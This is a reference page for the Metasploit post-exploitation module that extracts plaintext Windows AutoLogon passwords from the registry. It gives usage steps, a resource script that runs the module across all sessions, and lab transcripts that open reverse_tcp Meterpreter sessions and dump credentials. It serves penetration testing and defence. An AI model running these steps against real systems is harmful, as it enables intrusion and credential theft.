Windows Gather AutoLogin User Credential Extractor - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/windows_autologin metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather AutoLogin User Credential Extractor
Module: post/windows/gather/credentials/windows_autologin
Source code: modules/post/windows/gather/credentials/windows_autologin.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2000 to 2008 R2) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/windows_autologin

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/windows_autologin
msf post(windows_autologin) > show options
    ... show and set options ...
msf post(windows_autologin) > set SESSION session-id
msf post(windows_autologin) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/windows_autologin")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This module reads the registry keys associated with Microsoft Window's AutoLogin feature which keeps a plaintext version of the password in the registry.

To turn on Windows Autologin feature, follow the instructions from Microsoft.

  1. Open registry editor (regedit) and navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
  2. Create the following String Values
    1. AutoAdminLogin set to 1
    2. DefaultUserName set to the username
    3. DefaultPassword set to the password
    4. Optional: DefaultDomain set to the domain

Verification Steps


  1. Configure autologin
  2. Start msfconsole
  3. get a shell on a vulnerable windows computer
  4. Do: use post/windows/gather/credentials/windows_autologin
  5. Do: set session [#]
  6. Do: run
  7. You should receive credentials.

Scenarios


Windows 2008 R2 (64-bit)

$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(handler) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Starting the payload handler...
[*] Sending stage (1188415 bytes) to 10.0.2.11
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.11:49262) at 2017-07-22 11:59:22 -0500

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/credentials/windows_autologin 
msf post(windows_autologin) > set session 1
session => 1
msf post(windows_autologin) > run

[*] Running against WIN-QPZJFHIS6PT on session 1
[+] AutoAdminLogon=1, DefaultDomain=mydomain, DefaultUser=Administrator, DefaultPassword=p@ssw0rd
[*] Post module execution completed

Windows 2003

msf6 post(windows/gather/credentials/windows_autologin) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN2003
OS              : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 3...
msf6 post(windows/gather/credentials/windows_autologin) > run

[*] Running against WIN2003 on session 3
[+] AutoAdminLogon=, DefaultDomain=WIN2003, DefaultUser=Administrator, DefaultPassword=TestPassword
[*] Post module execution completed

Windows 7 (32-bit)

$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(handler) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Starting the payload handler...
[*] Sending stage (956991 bytes) to 10.0.2.47
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.47:49215) at 2017-07-23 11:33:53 -0500

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/gather/credentials/windows_autologin 
msf post(windows_autologin) > set session 1
session => 1
msf post(windows_autologin) > run

[*] Running against IE8WIN7 on session 1
[+] AutoAdminLogon=1, DefaultDomain=IE8WIN7, DefaultUser=IEUser, DefaultPassword=
[*] Post module execution completed

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/windows_autologin post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/windows_autologin

msf6 post(windows/gather/credentials/windows_autologin) > show info

       Name: Windows Gather AutoLogin User Credential Extractor
     Module: post/windows/gather/credentials/windows_autologin
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Myo Soe

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts the plain-text Windows user login password in 
  Registry. It exploits a Windows feature that Windows (2000 to 2008 
  R2) allows a user or third-party Windows Utility tools to configure 
  User AutoLogin via plain-text password insertion in 
  (Alt)DefaultPassword field in the registry location - 
  HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all 
  users.

References:
  http://support.microsoft.com/kb/315231
  http://core.yehg.net/lab/#tools.exploits

Module Options


This is a complete list of options available in the windows/gather/credentials/windows_autologin post exploitation module:

msf6 post(windows/gather/credentials/windows_autologin) > show options

Module options (post/windows/gather/credentials/windows_autologin):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/windows_autologin post exploitation module:

msf6 post(windows/gather/credentials/windows_autologin) > show advanced

Module advanced options (post/windows/gather/credentials/windows_autologin):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/windows_autologin module can do:

msf6 post(windows/gather/credentials/windows_autologin) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/windows_autologin post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/windows_autologin) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The Host <HOST_NAME> is not configured to have AutoLogon password


Here is a relevant code snippet related to the "The Host <HOST_NAME> is not configured to have AutoLogon password" error message:

66:	      creds << [du2, dp2, do2]
67:	      print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}")
68:	    end
69:	
70:	    if has_al == 0
71:	      print_status("The Host #{host_name} is not configured to have AutoLogon password")
72:	      return
73:	    end
74:	
75:	    creds.each do |cred|
76:	      create_credential(

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Myo Soe

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.